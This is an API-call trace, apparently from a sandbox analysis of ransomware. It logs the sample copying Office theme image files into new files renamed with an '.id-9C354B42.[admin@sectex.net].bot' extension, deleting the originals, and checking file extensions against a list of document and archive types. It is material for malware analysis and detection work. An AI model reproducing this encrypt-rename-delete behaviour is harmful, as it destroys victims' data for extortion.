	[0047.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png")) returned 0x20
	[0047.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0047.695] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0047.695] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.695] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.695] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0047.695] GetLastError () returned 0x0
	[0047.695] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x4c45, lpOverlapped=0x0) returned 1
	[0047.697] WriteFile (in: hFile=0x200, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x4c50, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x4c50, lpOverlapped=0x0) returned 1
	[0047.698] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.698] WriteFile (in: hFile=0x200, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0047.699] SetEndOfFile (hFile=0x200) returned 1
	[0047.699] CloseHandle (hObject=0x200) returned 1
	[0047.699] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.699] SetEndOfFile (hFile=0x214) returned 1
	[0047.700] CloseHandle (hObject=0x214) returned 1
	[0047.700] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0047.700] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png")) returned 1
	[0047.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75
	[0047.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75
	[0047.700] lstrlenW (lpString=".doc") returned 4
	[0047.700] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0047.700] lstrlenW (lpString=".docx") returned 5
	[0047.700] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0047.700] lstrlenW (lpString=".pdf") returned 4
	[0047.700] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0047.700] lstrlenW (lpString=".xls") returned 4
	[0047.700] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0047.700] lstrlenW (lpString=".xlsx") returned 5
	[0047.700] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0047.700] lstrlenW (lpString=".ppt") returned 4
	[0047.700] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0047.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75
	[0047.700] lstrlenW (lpString=".zip") returned 4
	[0047.701] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0047.701] lstrlenW (lpString=".rar") returned 4
	[0047.701] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0047.701] lstrlenW (lpString=".bz2") returned 4
	[0047.701] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0047.701] lstrlenW (lpString=".7z") returned 3
	[0047.701] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0047.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75
	[0047.701] lstrlenW (lpString=".dbf") returned 4
	[0047.701] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0047.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75
	[0047.701] lstrlenW (lpString=".1cd") returned 4
	[0047.701] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0047.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75
	[0047.701] lstrlenW (lpString=".jpg") returned 4
	[0047.701] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0047.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75
	[0047.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75
	[0047.701] lstrlenW (lpString=".doc") returned 4
	[0047.701] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0047.701] lstrlenW (lpString=".docx") returned 5
	[0047.701] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0047.701] lstrlenW (lpString=".pdf") returned 4
	[0047.701] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0047.701] lstrlenW (lpString=".xls") returned 4
	[0047.701] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0047.701] lstrlenW (lpString=".xlsx") returned 5
	[0047.701] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0047.701] lstrlenW (lpString=".ppt") returned 4
	[0047.701] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0047.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75
	[0047.701] lstrlenW (lpString=".zip") returned 4
	[0047.701] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0047.701] lstrlenW (lpString=".rar") returned 4
	[0047.702] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0047.702] lstrlenW (lpString=".bz2") returned 4
	[0047.702] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0047.702] lstrlenW (lpString=".7z") returned 3
	[0047.702] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0047.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75
	[0047.702] lstrlenW (lpString=".dbf") returned 4
	[0047.702] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0047.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75
	[0047.702] lstrlenW (lpString=".1cd") returned 4
	[0047.702] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0047.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75
	[0047.702] lstrlenW (lpString=".jpg") returned 4
	[0047.702] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0047.702] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0047.702] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0047.702] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0047.703] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1737) returned 1
	[0047.703] CloseHandle (hObject=0x214) returned 1
	[0047.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif")) returned 0x20
	[0047.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0047.703] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0047.703] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.703] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.703] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.026] GetLastError () returned 0x0
	[0048.026] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x6c9, lpOverlapped=0x0) returned 1
	[0048.027] WriteFile (in: hFile=0x1d0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x6d0, lpOverlapped=0x0) returned 1
	[0048.028] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.028] WriteFile (in: hFile=0x1d0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0048.028] SetEndOfFile (hFile=0x1d0) returned 1
	[0048.028] CloseHandle (hObject=0x1d0) returned 1
	[0048.028] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.028] SetEndOfFile (hFile=0x214) returned 1
	[0048.029] CloseHandle (hObject=0x214) returned 1
	[0048.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0048.029] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif")) returned 1
	[0048.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76
	[0048.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76
	[0048.030] lstrlenW (lpString=".doc") returned 4
	[0048.030] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0048.030] lstrlenW (lpString=".docx") returned 5
	[0048.030] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0048.030] lstrlenW (lpString=".pdf") returned 4
	[0048.030] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0048.030] lstrlenW (lpString=".xls") returned 4
	[0048.030] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0048.030] lstrlenW (lpString=".xlsx") returned 5
	[0048.030] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0048.030] lstrlenW (lpString=".ppt") returned 4
	[0048.030] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0048.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76
	[0048.030] lstrlenW (lpString=".zip") returned 4
	[0048.030] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0048.030] lstrlenW (lpString=".rar") returned 4
	[0048.030] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0048.030] lstrlenW (lpString=".bz2") returned 4
	[0048.030] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0048.030] lstrlenW (lpString=".7z") returned 3
	[0048.030] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0048.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76
	[0048.030] lstrlenW (lpString=".dbf") returned 4
	[0048.030] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0048.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76
	[0048.030] lstrlenW (lpString=".1cd") returned 4
	[0048.030] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0048.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76
	[0048.031] lstrlenW (lpString=".jpg") returned 4
	[0048.031] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0048.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76
	[0048.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76
	[0048.031] lstrlenW (lpString=".doc") returned 4
	[0048.031] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0048.031] lstrlenW (lpString=".docx") returned 5
	[0048.031] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0048.031] lstrlenW (lpString=".pdf") returned 4
	[0048.031] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0048.031] lstrlenW (lpString=".xls") returned 4
	[0048.031] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0048.031] lstrlenW (lpString=".xlsx") returned 5
	[0048.031] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0048.031] lstrlenW (lpString=".ppt") returned 4
	[0048.031] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0048.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76
	[0048.031] lstrlenW (lpString=".zip") returned 4
	[0048.031] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0048.031] lstrlenW (lpString=".rar") returned 4
	[0048.031] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0048.031] lstrlenW (lpString=".bz2") returned 4
	[0048.031] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0048.031] lstrlenW (lpString=".7z") returned 3
	[0048.031] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0048.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76
	[0048.031] lstrlenW (lpString=".dbf") returned 4
	[0048.031] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0048.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76
	[0048.031] lstrlenW (lpString=".1cd") returned 4
	[0048.031] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0048.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76
	[0048.031] lstrlenW (lpString=".jpg") returned 4
	[0048.031] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0048.032] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0048.032] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0048.032] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0048.077] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=30170) returned 1
	[0048.078] CloseHandle (hObject=0x1fc) returned 1
	[0048.078] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png")) returned 0x20
	[0048.078] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.078] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0048.078] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.078] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.078] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0048.139] GetLastError () returned 0x0
	[0048.139] ReadFile (in: hFile=0x1fc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x75da, lpOverlapped=0x0) returned 1
	[0048.141] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x75e0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x75e0, lpOverlapped=0x0) returned 1
	[0048.142] ReadFile (in: hFile=0x1fc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.142] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0048.142] SetEndOfFile (hFile=0x184) returned 1
	[0048.142] CloseHandle (hObject=0x184) returned 1
	[0048.143] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.143] SetEndOfFile (hFile=0x1fc) returned 1
	[0048.144] CloseHandle (hObject=0x1fc) returned 1
	[0048.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0048.144] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png")) returned 1
	[0048.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77
	[0048.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77
	[0048.144] lstrlenW (lpString=".doc") returned 4
	[0048.144] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0048.144] lstrlenW (lpString=".docx") returned 5
	[0048.144] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0048.144] lstrlenW (lpString=".pdf") returned 4
	[0048.144] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0048.144] lstrlenW (lpString=".xls") returned 4
	[0048.144] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0048.144] lstrlenW (lpString=".xlsx") returned 5
	[0048.144] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0048.144] lstrlenW (lpString=".ppt") returned 4
	[0048.144] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0048.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77
	[0048.144] lstrlenW (lpString=".zip") returned 4
	[0048.145] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0048.145] lstrlenW (lpString=".rar") returned 4
	[0048.145] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0048.145] lstrlenW (lpString=".bz2") returned 4
	[0048.145] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0048.145] lstrlenW (lpString=".7z") returned 3
	[0048.145] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0048.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77
	[0048.145] lstrlenW (lpString=".dbf") returned 4
	[0048.145] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0048.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77
	[0048.145] lstrlenW (lpString=".1cd") returned 4
	[0048.145] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0048.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77
	[0048.145] lstrlenW (lpString=".jpg") returned 4
	[0048.145] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0048.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77
	[0048.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77
	[0048.145] lstrlenW (lpString=".doc") returned 4
	[0048.145] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0048.145] lstrlenW (lpString=".docx") returned 5
	[0048.145] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0048.145] lstrlenW (lpString=".pdf") returned 4
	[0048.145] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0048.145] lstrlenW (lpString=".xls") returned 4
	[0048.145] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0048.145] lstrlenW (lpString=".xlsx") returned 5
	[0048.145] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0048.145] lstrlenW (lpString=".ppt") returned 4
	[0048.145] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0048.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77
	[0048.145] lstrlenW (lpString=".zip") returned 4
	[0048.145] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0048.145] lstrlenW (lpString=".rar") returned 4
	[0048.146] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0048.146] lstrlenW (lpString=".bz2") returned 4
	[0048.146] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0048.146] lstrlenW (lpString=".7z") returned 3
	[0048.146] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0048.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77
	[0048.146] lstrlenW (lpString=".dbf") returned 4
	[0048.146] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0048.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77
	[0048.146] lstrlenW (lpString=".1cd") returned 4
	[0048.146] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0048.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77
	[0048.146] lstrlenW (lpString=".jpg") returned 4
	[0048.146] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0048.146] lstrcmpiW (lpString1=".CHM", lpString2=".bot") returned 1
	[0048.146] lstrlenW (lpString="VBOB6.CHM") returned 9
